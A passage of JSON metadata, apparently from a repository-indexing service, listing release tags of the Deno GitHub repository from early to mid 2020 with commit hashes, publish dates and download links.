,"sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8f